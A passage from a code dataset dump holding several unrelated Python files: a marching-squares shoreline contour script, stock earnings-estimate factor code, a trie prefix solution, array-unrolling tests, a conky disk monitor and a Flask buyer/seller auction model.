15 cases in total (see wikipedia \"marching squares\" for reference)\n#a is the top left, b is the top right, c is the bottom right, d is the bottom left, in the clockwise sequence\n#a, b, c, d are not the index, they're values of the referred point\ndef case(a,b,c,d):\n if a>0:\n if b>0:\n if c>0:\n if d>0:\n case_num=\"0\"\n else:\n case_num=\"1\"\n else:\n if d>0:\n case_num=\"2\"\n else:\n case_num=\"3\"\n else:\n if c>0:\n if d>0:\n case_num=\"4\"\n else:\n case_num=\"5\"\n else:\n if d>0:\n case_num=\"6\"\n else:\n case_num=\"7\"\n else:\n if b>0:\n if c>0:\n if d>0:\n case_num=\"8\"\n else:\n case_num=\"9\"\n else:\n if d>0:\n case_num=\"10\"\n else:\n case_num=\"11\"\n else:\n if c>0:\n if d>0:\n case_num=\"12\"\n else:\n case_num=\"13\"\n else:\n if d>0:\n case_num=\"14\"\n else:\n case_num=\"15\"\n return case_num\n\nline_list=[]\nfor y in np.arange(len(band1[0])-1):\n print(y)\n for x in np.arange(145,2047):\n matrix_slr=elev_slr(1)\n top_left_elev = matrix_slr[x][y]\n top_right_elev = matrix_slr[x][y+1]\n bottom_left_elev = matrix_slr[x+1][y]\n bottom_right_elev = matrix_slr[x+1][y+1]\n caseNum=case(top_left_elev,top_right_elev,bottom_right_elev,bottom_left_elev)\n if caseNum==\"0\" or caseNum==\"15\":\n continue\n #if it is case 5 or 10, then we need to get the value of the saddle point\n elif caseNum==\"5\":\n #get the value of the center point\n avg_elev=0.25 * (top_left_elev + top_right_elev + bottom_left_elev + bottom_right_elev)\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n if avg_elev>0:\n \n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line2=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n line_list.append(line2)\n else:\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis-0.5*yres]]\n line2=[[mid_x_axis,mid_y_axis+0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n line_list.append(line2)\n elif caseNum==\"10\":\n avg_elev=0.25 * (top_left_elev + top_right_elev + bottom_left_elev + bottom_right_elev)\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n if avg_elev>0:\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis-0.5*yres]]\n line2=[[mid_x_axis,mid_y_axis+0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n line_list.append(line2)\n else:\n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line2=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n line_list.append(line2)\n elif caseNum==\"1\" or caseNum==\"14\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n elif caseNum==\"2\" or caseNum==\"13\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis,mid_y_axis+0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n elif caseNum==\"3\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n elif caseNum==\"4\" or caseNum==\"11\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n elif caseNum==\"6\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n 
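# cases 6 and 9 split the cell into left and right halves, so the contour\r\n # is a vertical segment through the cell centre\r\n 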
line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n elif caseNum==\"7\" or caseNum==\"8\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis,mid_y_axis-0.5*yres]]\n line_list.append(line1)\n elif caseNum==\"9\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis,mid_y_axis-0.5*yres],[mid_x_axis,mid_y_axis+0.5*yres]]\n line_list.append(line1)\n elif caseNum==\"12\":\n mid_x_axis = getCoordinate(x,y)[0]\n mid_y_axis= getCoordinate(x,y)[1]\n line1=[[mid_x_axis-0.5*xres,mid_y_axis],[mid_x_axis+0.5*xres,mid_y_axis]]\n line_list.append(line1)\n\nline_json=[]\nall_line_segments=line_list\nprint(\"number of line segment is \",len(all_line_segments))\nwhile len(all_line_segments)>0:\n print(len(line_json),len(all_line_segments))\n #create a list named line_string to store each line\n line_string=[]\n first_pt=all_line_segments[0][0]\n second_pt=all_line_segments[0][1]\n line_string.append(first_pt)\n line_string.append(second_pt)\n all_line_segments.remove(all_line_segments[0])\n\n \n while any(second_pt in sl for sl in all_line_segments):\n for i in range(len(all_line_segments)):\n for j in range(2):\n if all_line_segments[i][j]==second_pt:\n if j==0:\n\n line_string.append(all_line_segments[i][1])\n second_pt=all_line_segments[i][1]\n all_line_segments.remove(all_line_segments[i])\n else:\n line_string.append(all_line_segments[i][0])\n second_pt=all_line_segments[i][0]\n all_line_segments.remove(all_line_segments[i])\n break\n else:\n continue \n break\n while any(first_pt in sl for sl in all_line_segments):\n for i in range(len(all_line_segments)):\n for j in range(2):\n if all_line_segments[i][j]==first_pt:\n if j==0:\n line_string=[all_line_segments[i][1]]+line_string\n first_pt=all_line_segments[i][1]\n all_line_segments.remove(all_line_segments[i])\n else:\n line_string=[all_line_segments[i][0]]+line_string\n first_pt=all_line_segments[i][0]\n all_line_segments.remove(all_line_segments[i])\n break\n else:\n continue\n break\n \n #if the line string is a basin, then we should not append it to the final list\n if line_string[0]==line_string[-1]:\n poly=Polygon([tuple(i) for i in line_string])\n if (line_string[0][0]-ulx)%xres==0:\n pt=Point(line_string[0][0]+0.5*xres,line_string[0][1])\n pt_value=elev_slr(1)[(c_uly-line_string[0][1])//abs(yres)][(line_string[0][0]-c_ulx)//xres]\n if poly.contains(pt):\n if pt_value>0:\n line_json.append(line_string)\n else:\n if pt_value<=0:\n line_json.append(line_string)\n else:\n pt=Point(line_string[0][0],line_string[0][1]+0.5*yres)\n pt_value=elev_slr(1)[(c_uly-line_string[0][1])//abs(yres)][(line_string[0][0]-c_ulx)//xres]\n if poly.contains(pt):\n if pt_value>0:\n line_json.append(line_string)\n else:\n if pt_value<=0:\n line_json.append(line_string)\n \n else:\n line_json.append(line_string)\n\n\nprint(line_json)\n \n\ndata={\n \"type\": \"FeatureCollection\",\n \"features\": [ \n {\n \"type\": \"Feature\", \n \"geometry\":{\n \"type\": \"MultiLineString\",\n \"coordinates\": line_json\n }}]\n }\n\nwith open('/Users/ziyangliu/Downloads/WA_SEW_dems/data_1ft.json', 'w', encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False, indent=4) 
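\r\n# Quick sanity check (an illustrative sketch, not part of the original\r\n# pipeline; it just re-reads the file written above):\r\n#\r\n# with open('/Users/ziyangliu/Downloads/WA_SEW_dems/data_1ft.json') as f:\r\n# data_check = json.load(f)\r\n# print('shoreline pieces:', len(data_check['features'][0]['geometry']['coordinates']))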
","repo_name":"JerryLiu-96/Grays_Harbor_Storymap","sub_path":"assets/shoreline.py","file_name":"shoreline.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72802866473","text":"__author__ = 'xiaofeng'\nimport os\nimport numpy as np\nimport pandas as pd\nimport logging as logging\n\nimport source.common.GlobalConstant as GlobalConstant\nfrom source.common.Utils import Date2Str\nfrom source.common.Utils import Str2Date\nfrom source.common.QDate import FindTradingDay\nfrom source.common.Stock import Stock\nfrom pandas.core.index import InvalidIndexError\n\n\ndef EPFY2Calc(stockId, date):\n return _getEarningEstFromDB_byDate(stockId, date)\n\n#EarningEstCache = None\ndef getEarningsEstFromDB_Bk():\n startDt = GlobalConstant.DataStartDate\n fieldName = 'EPS_AVG'\n\n ## EST_REPORT_DT is not needed if Type has no data error.\n ## However, there are data errors,e.g. ['000629.SZ', '2009-04-03']\n sqlQuery = \"\"\"\n select S_INFO_WINDCODE Ticker, EST_DT, EPS_AVG, S_EST_YEARTYPE Type\n from WindDB.dbo.AShareConsensusData\n where EST_DT>'%s' and CONSEN_DATA_CYCLE_TYP = '263002000'\n order by est_dt\n \"\"\" % startDt\n df = pd.read_sql(sqlQuery, GlobalConstant.DBCONN_WIND)\n stockIDs = np.unique(df.Ticker.tolist())\n\n # dictionary of data frame with stockID being the key\n EarningEstCacheFY1 = {}\n EarningEstCacheFY2 = {}\n EarningEstCacheFY3 = {}\n\n for stockId in stockIDs:\n dfByStk = df[df.Ticker == stockId]\n\n EPFY1 = _getFYFromDataFrame(stockId, dfByStk, 'FY1', fieldName)\n EPFY2 = _getFYFromDataFrame(stockId, dfByStk, 'FY2', fieldName)\n EPFY3 = _getFYFromDataFrame(stockId, dfByStk, 'FY3', fieldName)\n\n EarningEstCacheFY1[stockId] = EPFY1\n EarningEstCacheFY2[stockId] = EPFY2\n EarningEstCacheFY3[stockId] = EPFY3\n\n\ndef _getFYFromDataFrame(stockId, dfByStk, FYType, fieldName):\n maxLagDays = 120 ## shall it be a GlobalConstant ??\n dfByStkFY = dfByStk[dfByStk.Type == FYType]\n ### the following is wrong!!!\n ### I am trying to set Est_DT as index of the dataframe, and then use asof to get the estDt\n estDts = pd.to_datetime(dfByStkFY['EST_DT'], format('%Y%m%d')) # rows are sorted by EST_DT\n data = pd.Series(dfByStkFY[fieldName].tolist(),index=estDts)\n\n EPFY = pd.TimeSeries()\n earningEstFY = np.nan\n dates = GlobalConstant.BacktestDates\n for dt in dates:\n try:\n estDt = data.index.asof(dt) # found the Est_Dt using AsOf\n except InvalidIndexError:\n logging.error('Data Error: ' + stockId + ', ' + Date2Str(dt))\n estDt = Str2Date(\"19000101\")\n\n if estDt is not np.nan and (dt-estDt).days < maxLagDays: # discard it if it is too stale\n earningEstFY = data.ix[estDt] # is this number (earning forecast) an annual number?\n px = Stock.ByWindID(stockId).UnAdjPrice(estDt)\n EPFY[dt] = earningEstFY/px\n\n return EPFY\n\n\n# #todo\ndef _getEarningEstFromDB_byDate(stockId, date, fieldName = 'EPS_AVG'):\n pass\n# '''\n# :param stockId: Wind stock id\n# :param date: a string with format \"yyyymmdd\"\n# :param fieldName: a string\n# :return: a float64\n# '''\n#\n# MaxLagDays = 120 ## shall it be a GlobalConstant ??\n# value = np.nan\n#\n# tradingDt = FindTradingDay(date)\n# tradingDtStr = Date2Str(tradingDt)\n# global EarningEstCache\n# cacheFile = GlobalConstant.DATA_FactorScores_DIR + \"EarningEstCache.dat\"\n#\n# if EarningEstCache is None:\n# if os.path.exists(cacheFile):\n# EarningEstCache = pd.read_pickle(cacheFile) ## it is a pd.Series with index being date\n#\n# if EarningEstCache is 
None:\n# EarningEstCache = pd.Series() # the cache file doesn't exist\n#\n# if stockId in EarningEstCache:\n# df = EarningEstCache.ix[stockId] ## should allow AsOf, e.g. allow less than 5 days stale\n# if tradingDt in df.index:\n# dt = df.index.asof(tradingDt)\n# if(tradingDt - dt < MaxLagDays): # discard it if it is too stale\n# value = df.ix[dt][fieldName]\n# px = Stock.ByWindID(stockId).UnAdjPrice(dt)\n# ep = value/px\n# return ep\n# return np.nan\n#\n# # we get to this point, so either the cache file doesn't exist or the cache doesn't contain the date\n# # then query database\n# # S_EST_YEARTYPE: FY1, FY2 and FY3\n# # CONSEN_DATA_CYCLE_TYP 263001000: 30 days, 263001000: 90 days, 263001000: 180 days\n# # each row os the table represents a sell side analyst issues a forecast\n# # on any given date, only small portion of stocks would have data\n# # given a stock and a date, the goal is to find the most recent row (consensus forecast) up to that date\n# # all per-share-fields are non-split-adjusted (not confirmed!!!)\n# # EPS_AVG would never be Null\n# # other fields might be Null\n# # deal with EPS_AVG first and then extend to other fields\n#\n# dataStartDt = GlobalConstant.DataStartDate\n# sqlQuery = \"\"\"\n# select EST_DT, EPS_AVG, EST_REPORT_DT\n# from WindDB.dbo.AShareConsensusData\n# where S_INFO_WINDCODE = '%s' and EST_DT>'%s' and CONSEN_DATA_CYCLE_TYP = '263002000' and S_EST_YEARTYPE = 'FY2'\n# order by est_dt\n# \"\"\" % (stockId, dataStartDt)\n# df = pd.read_sql(sqlQuery, GlobalConstant.DBCONN_WIND)\n# #GlobalConstant.DBCONN_WIND.close()\n# df = df.set_index(pd.to_datetime(df['EST_DT'], format('%Y%m%d')))\n# try:\n# dt = df.index.asof(tradingDt)\n# except InvalidIndexError:\n# logging.error('Data Error: ' + stockId + ', ' + Date2Str(tradingDt))\n# dt = \"19000101\"\n# #df = df.drop_duplicates(subset='EST_DT', keep='last', inplace=True) ## argument keep only works with v0.17.0\n# df.drop_duplicates(subset='EST_DT', inplace=True) ## the current version of pd is v0.16.2\n# dt = df.index.asof(tradingDt) ## to reproduce the InvalidIndexError. it is likely a data error, e.g. 
['000629.SZ', '2009-04-03']\n#\n# if dt is not np.nan and (tradingDt - dt).days < MaxLagDays: # discard it if it is too stale\n# value = df.ix[dt][fieldName] # is this number (earning forecast) an annual number?\n# px = Stock.ByWindID(stockId).UnAdjPrice(dt)\n# value = value/px\n#\n# EarningEstCache[stockId] = df\n# return value\n\n\ndef SaveEarningEstCache():\n cacheFile = GlobalConstant.DATA_FactorScores_DIR + \"EarningEstCache.dat\"\n pd.to_pickle(EarningEstCache,cacheFile)\n\n\n","repo_name":"dannychua/stockmodel","sub_path":"source/common/Factorlib/EarningsEst.py","file_name":"EarningsEst.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39441583532","text":"#!/usr/bin/python3\n\n\"\"\"\nInput: [zebra, dog, duck, dove]\nOutput: {z, dog, du, dov}\nwhere we can see that\nzebra = z\ndog = dog\nduck = du\ndove = dov\n\"\"\"\n\n\nclass TrieNode:\n def __init__(self):\n self.children = [None] * 26\n self.cnt = 0\n\n\nclass Solution:\n # @param A : list of strings\n # @return a list of strings\n def prefix(self, A):\n # First insert all the words in Trie\n root = TrieNode()\n # import pdb; pdb.set_trace()\n for word in A:\n root = self.insertTrie(root, word)\n\n res = []\n # Find prefix from cnt in Trie\n for word in A:\n res.append(self.prefixTrie(root, word))\n\n return res\n\n def insertTrie(self, root, word):\n if root is None:\n return None\n\n cur = root\n for char in word:\n idx = ord(char) - ord('a')\n if cur.children[idx] is None:\n cur.children[idx] = TrieNode()\n cur.cnt += 1\n cur = cur.children[idx]\n return root\n\n def prefixTrie(self, root, word):\n if root is None:\n return \"\"\n\n res = \"\"\n cur = root\n for char in word:\n idx = ord(char) - ord('a')\n if cur.children[idx]:\n if cur.cnt == 1:\n break\n res += char\n cur = cur.children[idx]\n return res\n\n\nif __name__ == '__main__':\n # Input = [\"zebra\", \"dog\", \"duck\", \"dove\"]\n Input = [\"bearcat\", \"bert\"]\n print(Solution().prefix(Input))\n","repo_name":"hrishikeshtak/Coding_Practises_Solutions","sub_path":"interviewbit/tree/shortest-unique-prefix.py","file_name":"shortest-unique-prefix.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26646031027","text":"\"\"\"Tests for the '_unrolling' module.\"\"\"\nimport pytest\nfrom numpy.testing import assert_array_equal\nimport numpy as np\nfrom mymllib.optimization import unroll, undo_unroll\n\n\na1, a2, a3 = np.arange(10), np.arange(22, 38), np.ones(12)\n# Test matrices\nmatrices = (a1.reshape((2, 5), order='C'), a2.reshape((4, 4), order='C'), a3.reshape((4, 3), order='C'))\n# A one-dimensional array that is expected after unrolling the test matrices\nunrolled_matrices = np.hstack((a1, a2, a3))\n\n\n@pytest.mark.parametrize(\"arrays, expected\", [\n (matrices, unrolled_matrices),\n (np.arange(10), np.arange(10))\n])\ndef test_unroll(arrays, expected):\n result = unroll(arrays)\n\n assert_array_equal(result, expected)\n\n\ndef test_undo_unroll__source_array_not_1D():\n with pytest.raises(ValueError):\n undo_unroll(np.ones((9, 1)), ((3, 3),))\n\n\n@pytest.mark.parametrize(\"source_array, shapes\", [\n (np.ones(100), ((5, 7), (3, 6))), # Source array contains more elements than specified by shapes\n (np.ones(10), ((4, 3),)), # Source array contains less elements than specified by shapes\n])\ndef test_undo_unroll__invalid_shapes(source_array, shapes):\n with 
pytest.raises(ValueError):\n undo_unroll(source_array, shapes)\n\n\n@pytest.mark.parametrize(\"source_array, shapes, expected\", [\n (unrolled_matrices, [matrix.shape for matrix in matrices], matrices),\n (np.arange(10), [(10,)], (np.arange(10),))\n])\ndef test_undo_unroll(source_array, shapes, expected):\n result = undo_unroll(source_array, shapes)\n\n for i in range(len(expected)):\n assert_array_equal(result[i], expected[i])\n","repo_name":"OlegPonomaryov/mymllib","sub_path":"mymllib/optimization/_tests/_unrolling_test.py","file_name":"_unrolling_test.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1770594784","text":"#!/usr/bin/env python\n\nimport os, string\nfrom sh import mount, lsblk\n\n## show debug messages\nDEBUG=False\ndemo_mode = True # setting this to true hides partition labels and uses generic dev entries.\n\n# CODE\nMODULE= \"StorageMonitor\"\n\n\n# this one prints debug output\ndef printd(dstr):\n\tif DEBUG:\n\t\tprint(\"[%s]: %s\" % (MODULE, dstr))\n\ndef real_fs(part):\n\tinfo = lsblk(\"-no\", \"name,fstype\", part).strip()\n\tinfo = info.split(\" \")\n\tprintd(info)\n\t\n\treturn info[1]\n\ndef parse_mounts():\n\tmountpoints = []\n\tout = mount().strip().split(\"\\n\")\n\t\n\tfor o in out:\n\t\to1 = o.split(\" on \")\t\t\n\t\t\n\t\to2 = o1[1].split(\" type \")\n\t\tshort_mount = o2[0].strip().replace(\"/run/media/igor/\", \"\")\n\t\tshort_mount = short_mount.replace(\"/media/\", \"\")\n\t\t\n\t\to3 = o2[1].split();\n\t\tif o3[0] == \"fuseblk\":\n\t\t\tfs = real_fs(o1[0].strip())\n\t\telse:\n\t\t\tfs = o3[0].strip()\n\t\t\n\t\tmountpoints.append({\"drive\": o1[0].strip(), \"mount\": o2[0].strip(), \"short_mount\": short_mount, \"fs\": fs})\n\t\n\treturn mountpoints\n\nmountpoints = parse_mounts()\nto_print = \"${goto 35}Disk/Mount pt.${goto 160}Type${goto 195}Total${goto 240}Used${goto 285}Free\\n\"\nto_print += \"${voffset -8}${goto 35}${color1}${hr 1}\\n\"\n# loop all sd{a..z} devices\nfor major in string.ascii_lowercase:\n\tdrive = \"/dev/sd%s\" % major\n\t\n\t# check if /dev/sdX exists\n\tif os.path.exists(drive):\n\t\thas_mounted_parts = False\n\t\t# loop all sdX{0-9} devices\n\t\tfor minor in string.digits:\n\t\t\tpartition = \"%s%s\" % (drive, minor)\n\t\t\t\n\t\t\t# now, check if it's mounted\n\t\t\tif os.path.exists(partition):\n\t\t\t\tprintd(\"checking %s\" % partition)\n\t\t\t\tmounted = False\n\t\t\t\tdev = None\n\t\t\t\t\n\t\t\t\tfor pt in mountpoints:\n\t\t\t\t\tif pt['drive'] == partition:\n\t\t\t\t\t\tdev = pt\n\t\t\t\t\t\tmounted = True\n\t\t\t\t\t\t\n\t\t\t\tprintd(\"is %s mounted? 
%s\" % (partition, str(mounted)))\n\t\t\t\t\n\t\t\t\t# if partition is mounted, show info\n\t\t\t\tif mounted:\n\t\t\t\t\t# add descriptive block before, because we don't want to show drives which aren't mounted\n\t\t\t\t\tif not has_mounted_parts:\n\t\t\t\t\t\tto_print += \"${goto 35}${color1}%s${color} (${color1}${diskio_write %s}${color} in, ${color1}${diskio_read %s}${color} out)\\n\" % (drive, drive, drive)\n\t\t\t\t\t\tto_print += \"${voffset -8}${goto 35}${color0}${hr 1}\\n\"\n\t\t\t\t\t\thas_mounted_parts = True\n\t\t\t\t\t# partition info now...\n\t\t\t\t\tif not demo_mode:\n\t\t\t\t\t\tmnt = dev['short_mount'][:100]+\"...\" if len(dev['short_mount']) > 100 else dev['short_mount']\n\t\t\t\t\telse:\n\t\t\t\t\t\tmnt = \"sd%s%s\" % (major, minor)\n\t\t\t\t\t\n\t\t\t\t\tto_print += \"${goto 35}|-${color1}%s${goto 162}%s${goto 192}${fs_size %s}${goto 237}${fs_used %s}${goto 282}${fs_free %s}${color}\\n\" % (mnt, dev['fs'][:5], dev['mount'], dev['mount'], dev['mount'])\n\t\t\telse:\n\t\t\t\tprintd(\"%s doesn't exist\" % partition)\n\t\tto_print += \"${voffset 5}\"\n\telse:\n\t\tprintd(\"%s doesn't exist\" % drive)\n\n# output\nprint(to_print)\n","repo_name":"ShadySquirrel/conky","sub_path":"storage_monitor.py","file_name":"storage_monitor.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9500116292","text":"from flask import Flask, render_template, request, redirect\nfrom flask_bootstrap import Bootstrap\nimport haversine as hs\nimport json\napp = Flask(__name__)\nBootstrap(app)\n\nclass BuyerTransaction:\n def __init__(self, idx, buyerIdx, v, vmin, vmax, bmin, bmax):\n self.status = 'pending'\n self.idx = idx\n self.buyerIdx = buyerIdx\n self.v = v\n self.vmax = vmax\n self.vmin = vmin\n self.bmin = bmin\n self.bmax = bmax\n self.agreedTransactionIdx = None\n self.T = None\n self.distance = None\n self.optimalAmount = None\n \n def __repr__(self):\n return \"status: {}, idx: {}, buyerIdx: {}, v: {}, vmax: {}, vmin: {}, bmin: {}, bmax: {}\".format(self.status,\n self.idx, self.buyerIdx, self.v, self.vmax, self.vmin, self.bmin, self.bmax) \n \n def changeStatusToAccepted(self):\n self.status = 'accepted'\n print('Seller transaction: '+str(self.idx)+' , status has been changed to \"Accepted\"')\n\n def changeStatusToComplete(self):\n self.status = 'completed'\n print('Buyer transaction: '+str(self.idx)+' , status has been changed to \"Completed\"')\n\nclass SellerTransaction:\n def __init__(self, idx, parentTransactionIdx, sellerIdx, c, cmin, cmax, smin, smax):\n self.status = 'pending'\n self.idx = idx\n self.sellerIdx = sellerIdx\n self.parentTransactionIdx = parentTransactionIdx\n self.c = c\n self.cmax = cmax\n self.cmin = cmin\n self.smin = smin\n self.smax = smax\n self.P = None\n self.R = None\n self.T = None\n self.optimalAmount = None\n self.distance = None\n\n def __repr__(self):\n return \"status: {}, idx: {}, sellerIdx: {}, parentTransactionIdx: {}, c: {}, cmax: {}, cmin: {}, smin: {}, smax: {}, P: {}, R: {}, T: {}, amount: {} \".format(self.status,\n self.idx, self.sellerIdx, self.parentTransactionIdx, self.c, self.cmax, self.cmin, self.smin, self.smax, self.P, self.R, self.T, self.optimalAmount)\n\nclass Buyer:\n def __init__(self, coordinate, idx):\n self.coordinate = coordinate\n self.idx = idx\n\n def __repr__(self):\n return \"idx: {}, coordinate: {}\".format(self.coordinate, self.idx)\n \n def createBuyerTransaction(self, transactionIdx,v, vmin, vmax, bmin, bmax):\n 
return BuyerTransaction(transactionIdx, self.idx, v, vmin, vmax, bmin, bmax)\n\n\nclass Seller:\n def __init__(self, coordinate, idx):\n self.coordinate = coordinate\n self.idx = idx\n \n def __repr__(self):\n return \"idx: {}, coordinate: {}\".format(self.coordinate, self.idx)\n\n def createSellerTransaction(self, transactionIdx, parentTransactionIdx, c, cmin, cmax, smin, smax):\n return SellerTransaction(transactionIdx, parentTransactionIdx, self.idx, c, cmin, cmax, smin, smax)\n\nclass Auctioneer:\n def __init__(self):\n self.location = []\n self.buyerTransaction = []\n self.sellerTransaction = []\n self.countBuyerTransaction = 5\n self.countSellerTransaction = 5\n self.buyers = []\n self.sellers = []\n \n def bt(self): return self.buyerTransaction\n def st(self): return self.sellerTransaction\n \n def fetchBuyerTransaction(self, idx):\n buyerTransaction = None\n for transaction in self.buyerTransaction:\n if(transaction.idx == idx):\n buyerTransaction = transaction\n return buyerTransaction\n if(buyerTransaction == None): \n print(\"Can not find buyerTransaction\")\n return False\n \n def fetchSellerTransaction(self, idx):\n sellerTransaction = None\n for transaction in self.sellerTransaction:\n if(transaction.idx == idx):\n sellerTransaction = transaction\n return sellerTransaction\n if(sellerTransaction == None): \n print(\"Can not find sellerTransaction\")\n return False\n \n def fetchSellerTransactionsByParentTransactionIdx(self, parentTransactionIdx):\n return [transaction for transaction in self.sellerTransaction if transaction.parentTransactionIdx == parentTransactionIdx]\n \n \n def computeSellerResponse(self, sellerTransacionIdx):\n sellerTransaction = self.fetchSellerTransaction(sellerTransacionIdx)\n buyerTransaction = self.fetchBuyerTransaction(sellerTransaction.parentTransactionIdx)\n sellerLocation = self.sellers[sellerTransaction.sellerIdx-1].coordinate\n buyerLocation = self.buyers[buyerTransaction.buyerIdx-1].coordinate\n sellerTransaction.distance = round(hs.haversine(sellerLocation,buyerLocation), 2)\n\n sellerTransaction.P = round(buyerTransaction.vmax/12 + sellerTransaction.cmin/4 + (2*buyerTransaction.v)/3,2)\n sellerTransaction.R = round(sellerTransaction.cmin/12 + buyerTransaction.vmax/4 + (2*sellerTransaction.c)/3)\n\n if((sellerTransaction.P < sellerTransaction.R) or (sellerTransaction.smin > buyerTransaction.bmax) or (buyerTransaction.bmin > sellerTransaction.smax)):\n print(\"Transction failed!\")\n sellerTransaction.status = \"failed\"\n return False\n \n sellerTransaction.T = (sellerTransaction.P + sellerTransaction.R)/2\n sellerTransaction.optimalAmount = round((((sellerTransaction.cmax - sellerTransaction.c)/sellerTransaction.cmax)*sellerTransaction.smax + ((1-((sellerTransaction.cmax - buyerTransaction.v)/sellerTransaction.cmax))*buyerTransaction.bmax))/2)\n print(\"Transction accepted!\")\n sellerTransaction.status = 'accepted'\n return True\n \n def completeBuyerTransaction(self, sellerTransactionIdx):\n sellerTransaction = self.fetchSellerTransaction(sellerTransactionIdx)\n buyerTransaction = self.fetchBuyerTransaction(sellerTransaction.parentTransactionIdx)\n if(sellerTransaction.status == 'accepted'):\n sellerTransaction.status = 'completed'\n buyerTransaction.status = 'completed'\n buyerTransaction.agreedTransactionIdx = sellerTransaction.idx\n buyerTransaction.T = sellerTransaction.T\n buyerTransaction.distance = sellerTransaction.distance\n buyerTransaction.optimalAmount = sellerTransaction.optimalAmount\n for transaction in 
self.fetchSellerTransactionsByParentTransactionIdx(sellerTransaction.parentTransactionIdx):\n if(transaction.idx != sellerTransaction.idx):\n transaction.status = 'failed'\n return True\n else: return False\n \n def getAcceptedTransaction(self, BuyerIdx):\n sellerTransaction = []\n for transaction in self.sellerTransaction:\n if(transaction.parentTransactionIdx == BuyerIdx and transaction.status == 'accepted'):\n sellerTransaction.append(transaction)\n \n if not sellerTransaction: return False\n else: return [ transaction.__dict__ for transaction in sellerTransaction ]\n \n def getBuyerPendingTransaction(self, idx):\n b_transaction = []\n for buyerTransaction in [transaction.__dict__ for transaction in self.buyerTransaction if transaction.buyerIdx == idx and transaction.status == 'pending']:\n b_transaction.append(buyerTransaction)\n for sellerTransaction in [transaction.__dict__ for transaction in self.sellerTransaction if transaction.parentTransactionIdx == buyerTransaction['idx'] and transaction.status == 'accepted']:\n b_transaction.append(sellerTransaction)\n return b_transaction\n \n def getBuyerCompletedTransaction(self, idx):\n b_transaction = []\n for buyerTransaction in [transaction.__dict__ for transaction in self.buyerTransaction if transaction.buyerIdx == idx]:\n if(buyerTransaction['status'] == 'completed'):\n b_transaction.append(buyerTransaction)\n return b_transaction\n \n def getSellerPendingTransaction(self, idx):\n b_transaction = []\n sellerLocation = self.sellers[idx-1].coordinate\n s_transactionIdxs = [sellerTransaction.parentTransactionIdx for sellerTransaction in self.sellerTransaction if sellerTransaction.sellerIdx == idx]\n for buyerTransaction in self.buyerTransaction:\n if( (buyerTransaction.idx not in s_transactionIdxs) and (buyerTransaction.status == 'pending')):\n buyerLocation = self.buyers[buyerTransaction.buyerIdx-1].coordinate\n distance = round(hs.haversine(sellerLocation,buyerLocation), 2)\n buyerTransactionDict = buyerTransaction.__dict__\n buyerTransactionDict['distance'] = distance\n b_transaction.append(buyerTransactionDict)\n return b_transaction\n \n def getSellerAcceptedTransaction(self, idx):\n return [ transaction.__dict__ for transaction in self.sellerTransaction if transaction.status == 'accepted' and transaction.sellerIdx == idx]\n \n def getSellerCompletedFailedTransaction(self, idx):\n return [ transaction.__dict__ for transaction in self.sellerTransaction if transaction.status in ['completed', 'failed'] and transaction.sellerIdx == idx]\n \n def getAuctioneerPendingTransaction(self):\n pendingTransaction = [transaction.__dict__ for transaction in self.buyerTransaction if transaction.status == 'pending']\n acceptedTransaction = [transaction.__dict__ for transaction in self.sellerTransaction if transaction.status == 'accepted']\n return pendingTransaction+acceptedTransaction\n \n def getAuctioneerCompletedTransaction(self):\n return [transaction.__dict__ for transaction in self.buyerTransaction if transaction.status == 'completed']\n \n def getAuctioneerFailedTransaction(self):\n return [transaction.__dict__ for transaction in self.sellerTransaction if transaction.status == 'failed']\n\n 